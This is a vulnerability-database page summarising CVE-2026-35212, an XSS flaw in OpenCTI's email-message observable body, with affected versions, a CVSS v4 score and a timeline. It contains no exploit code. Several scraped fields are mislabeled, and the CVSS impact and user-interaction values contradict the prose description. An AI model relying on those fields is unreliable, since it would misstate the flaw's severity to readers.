XSS Vulnerability in OpenCTI Platform by OpenCTI
CVE-2026-35212

5.3MEDIUM

Key Information:

Vendor: Opencti-platform
Status: Opencti
Vendor: CVE Published:; 2 June 2026

🔔 Create Opencti-platform Vulnerability Alert

What is CVE-2026-35212?

OpenCTI is an open-source platform designed for managing cyber threat intelligence. It has a vulnerability where versions prior to 7.260227.0 inadequately sanitize the content of the email-message observable body data, allowing an XSS attack to potentially occur. Although exploitation requires user interaction, it could enable an attacker to execute malicious scripts, leading to Cross-Site Request Forgery (CSRF) and potentially result in extensive session theft. Users are urged to upgrade to version 7.260227.0 or later to mitigate this risk.

Affected Version(s)

opencti < 7.260227.0

References

https://github.com/OpenCTI-Platform/opencti/security/advi...

x_refsource_CONFIRM

CVSS V4

Score:

5.3

Severity:

MEDIUM

Confidentiality:

None

Integrity:

None

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

Unknown

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Jun 2, 2026
Vulnerability Reserved
Apr 1, 2026

CVE-2026-35212 Data

JSON